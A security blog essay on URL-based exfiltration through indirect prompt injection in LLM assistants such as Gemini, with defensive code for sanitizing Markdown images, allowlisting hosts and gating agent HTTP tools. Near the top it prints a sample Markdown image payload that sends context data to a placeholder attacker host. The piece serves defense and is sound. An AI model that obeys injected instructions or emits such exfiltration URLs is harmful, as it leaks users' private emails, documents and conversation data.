The Rendering Channel Problem: How URL Injection Turns LLMs Into Data Pipes
Google’s BugHunters blog post on mitigating URL-based exfiltration in Gemini is worth reading carefully, not because the attack is new, but because of what it reveals about the structural problem sitting at the intersection of LLM capabilities and rich output rendering. This class of vulnerability has been documented across multiple AI assistants over the past few years, and the fact that Google is writing publicly about their mitigations signals that the problem is both real and genuinely tricky to solve.
The Mechanics of the Attack
The core of URL-based exfiltration in LLMs is a three-step chain. First, an attacker plants malicious instructions somewhere in content the model will process: a document, an email, a web page, a calendar event. Second, those instructions direct the model to construct a URL that encodes sensitive information from the conversation context, typically in query parameters. Third, if the client renders Markdown and auto-fetches resources like images, that URL gets requested and the data lands on the attacker’s server.
The Markdown vector looks like this:

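A representative payload (the attacker domain and query parameter here are placeholders) is a Markdown image whose URL smuggles conversation data into a query string:

```markdown
![loading](https://attacker.example/collect?q=SECRET_FROM_CONTEXT)
```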
When a Markdown renderer processes this as an image tag, the HTTP client automatically issues a GET request for the URL. No user interaction required. The data is already in flight before anyone notices anything unusual, and from the user’s perspective they just see a broken image or nothing at all.
What makes this particularly potent is that the injected instruction doesn’t need to be visible to the user. It can be hidden in white text on a white background in a document, buried in HTML comments in a webpage, or tucked into metadata fields the LLM processes but the user never reads. This is the indirect prompt injection model described in Kai Greshake et al.’s 2023 paper “Not What You’ve Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection”, which remains the foundational treatment of this attack class.
A Brief History of LLMs Getting Exfiltrated
Prompt injection as a concept predates most current AI assistants. Riley Goodside demonstrated in 2022 that you could override GPT-3’s behavior by embedding adversarial instructions in user-controlled input. The technique was largely theoretical for a while: models without tool access or rendering capabilities didn’t have useful exfiltration channels.
That changed when AI assistants gained browsing capabilities and started rendering Markdown in their responses. In 2023, security researcher Johann Rehberger demonstrated the attack against Bing Chat, showing that a malicious webpage could inject instructions that Bing would follow while summarizing content, including constructing exfiltration URLs. Similar demonstrations followed for ChatGPT with the Browsing and Plugins features enabled. Rehberger’s Embrace The Red blog catalogued a substantial number of these attacks across different AI systems and is worth reading if you want to see the full variety of exploitation techniques.
Gemini, with its deep integration into Google Workspace and its ability to process emails, documents, and calendar items, presents a particularly rich target. The amount of sensitive context potentially available to the model in a Workspace session is substantial, which raises the stakes for any exfiltration primitive.
Why This Is Harder to Fix Than It Looks
The naive fix is obvious: don’t render Markdown images in AI responses, or at least don’t auto-fetch them. But the problem has three distinct layers, and patching one doesn’t eliminate the others.
The model layer is where the injected instruction gets followed in the first place. You can train or fine-tune the model to refuse instructions that ask it to construct URLs containing conversation data. This is imperfect because adversarial instructions can be obfuscated, split across multiple turns, or framed in ways the model doesn’t recognize as exfiltration attempts. Jailbreak research has demonstrated repeatedly that model-level refusals are bypassable with sufficient creativity.
The rendering layer is where Markdown gets converted to HTML and image URLs get fetched. Stripping or sandboxing image tags in model output removes the auto-fetch side effect. But LLMs are used across many surfaces, some of which are third-party clients that Google doesn’t control. A Gemini API consumer building their own interface might render model output directly, reintroducing the vulnerability even if the hosted Gemini UI is safe.
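A rendering-layer mitigation can be sketched as a pre-render pass that neutralizes Markdown image syntax so nothing is auto-fetched. This is a minimal illustration, not a full Markdown parser; a production sanitizer should operate on the parsed HTML, and the attacker URL below is a placeholder:

```python
import re

# Markdown image syntax: ![alt](url). Replacing it before rendering
# removes the auto-fetch side effect. Regex-based for brevity only.
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)]*)\)")

def neutralize_images(markdown_text: str) -> str:
    """Replace image tags with a plain-text placeholder so no URL is requested."""
    return IMAGE_PATTERN.sub(
        lambda m: f"[image removed: {m.group(1) or 'untitled'}]", markdown_text
    )

print(neutralize_images("Done. ![status](https://attacker.example/log?q=SECRET)"))
```

The tradeoff is losing legitimate inline images; some clients instead rewrite image URLs through a caching proxy so the user’s client never contacts the origin directly.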
The network layer is where outbound requests to external URLs could be blocked or filtered. A strict Content Security Policy on the rendering client, or a proxy that validates outbound image requests against an allowlist, can prevent the data from actually leaving. But this requires control over every client that renders model output.
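An allowlist check at the network layer might look like the following sketch, where the allowed host is a hypothetical example; real deployments would pair this with a CSP and apply it wherever outbound image requests originate:

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: the only host this client may fetch images from.
ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

def is_allowed_image_url(url: str) -> bool:
    """Permit only https URLs whose exact host is on the allowlist."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in ALLOWED_IMAGE_HOSTS

print(is_allowed_image_url("https://assets.example.com/logo.png"))   # allowlisted host
print(is_allowed_image_url("https://attacker.example/log?q=SECRET")) # blocked host
```

Exact-host matching matters here: suffix checks like `url.endswith("example.com")` are bypassable with domains such as `evilexample.com`.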
Google’s approach in Gemini, based on what they’ve published, combines mitigations at multiple layers: model-level training to refuse exfiltration instructions, restrictions on URL rendering in responses, and client-side controls on auto-fetching. Defense in depth is the right call here because no single layer is reliable on its own.
The Deeper Structural Problem
What the URL exfiltration attack actually exposes is a fundamental tension in how LLM assistants are built. The capabilities that make them useful (processing rich external content, accessing user data in context, generating formatted output with embedded references) are the same capabilities that create the attack surface.
An LLM that can only answer questions about its training data and returns plain text has no exfiltration channel. The moment you add “process this document I uploaded” plus “render your response as Markdown,” you’ve connected an untrusted input channel to an output channel with network side effects, with the model’s entire context sitting in between. That’s an interesting data flow from a security standpoint.
This is structurally similar to problems that have appeared in other contexts. Server-Side Request Forgery attacks abuse the server as a proxy to reach internal resources. Cross-site scripting abuses the browser’s script execution as a channel between attacker-controlled content and user context. URL exfiltration in LLMs abuses the model and its rendering environment as a channel between attacker-controlled content and user data. The pattern is familiar even if the specific mechanism is new.
What This Means if You’re Building on LLM APIs
If you’re building applications on top of Gemini, GPT-4, or any other LLM that processes external content, this attack class is relevant to your threat model. A few concrete considerations:
First, if your application renders model output in a browser context, treat that output as untrusted HTML. Don’t pass raw model responses directly into innerHTML. Use a Markdown renderer that sanitizes output, strips image tags, or at minimum applies a CSP that blocks cross-origin image requests.
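The CSP approach mentioned above can be as simple as a response header that restricts image loads to the application’s own origin. A minimal example (directive values would vary per deployment):

```
Content-Security-Policy: default-src 'self'; img-src 'self'
```

With this policy in place, a browser refuses to issue the GET request for an attacker-hosted image even if a malicious tag slips past output sanitization.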
Second, if your application uses an LLM to process user-supplied documents or URLs, the content in those documents can contain adversarial instructions. The model may follow them. Prompt injection is not a solved problem at the model level, and you can’t assume current models will reliably refuse all malicious instructions embedded in processed content.
Third, be conservative about what context you include in the model’s prompt. Data that isn’t in the context can’t be exfiltrated. If your application has access to sensitive user data, think carefully about whether the model actually needs all of it for the task at hand, or whether you’re including it out of convenience.
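Context minimization can be enforced mechanically rather than by convention. A sketch, with illustrative field names, that strips a record down to what a given task actually needs before it enters the prompt:

```python
# Hypothetical: a summarization task needs only these fields of an
# email record; everything else stays out of the model's context.
TASK_FIELDS = {"subject", "body"}

def minimal_context(record: dict) -> dict:
    """Drop every field the task does not require before prompt assembly."""
    return {k: v for k, v in record.items() if k in TASK_FIELDS}

email = {"subject": "Q3 plan", "body": "Draft attached.",
         "ssn": "redacted", "home_address": "redacted"}
print(minimal_context(email))
```

An explicit allowlist of fields fails safe: new sensitive fields added to the record later are excluded by default instead of silently flowing into prompts.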
Fourth, for agentic applications, where the model can make network requests directly rather than merely influencing rendering, the stakes are higher. An agent with HTTP tool access that follows an injected exfiltration instruction doesn’t need the rendering layer at all: the URL gets fetched directly. This is a natural extension of the same attack class and one that becomes more relevant as LLMs are given more tool access.
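For the agentic case, one mitigation is to gate the HTTP tool itself rather than the rendering pipeline. A sketch, with a hypothetical allowlist and a caller-supplied fetch function standing in for whatever HTTP client the agent framework uses:

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the agent's HTTP tool may contact.
ALLOWED_TOOL_HOSTS = {"api.example.com"}

def guarded_fetch(url: str, fetch):
    """Refuse tool-level HTTP requests to hosts outside the allowlist."""
    host = urlsplit(url).hostname
    if host not in ALLOWED_TOOL_HOSTS:
        raise PermissionError(f"blocked outbound request to {host!r}")
    return fetch(url)

# An injected instruction pointing at an attacker host fails before any
# request is made, regardless of what the model decided to do.
try:
    guarded_fetch("https://attacker.example/collect?q=SECRET", fetch=lambda u: None)
except PermissionError as e:
    print(e)
```

Enforcing the policy in the tool wrapper, outside the model, means a successful prompt injection changes what the model asks for but not what the system permits.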
The OWASP LLM Top 10 lists prompt injection as LLM01, the top vulnerability class, for exactly these reasons. It’s not that individual attacks are catastrophically sophisticated. It’s that the attack surface is broad, the defenses are imperfect, and the consequences of a successful exfiltration in a model with access to email, documents, and calendar data can be significant.
Google publishing their mitigations openly is useful for the ecosystem. The more detail that’s available about what works and what doesn’t at each layer, the better position every builder is in when thinking through defenses for their own LLM-integrated applications.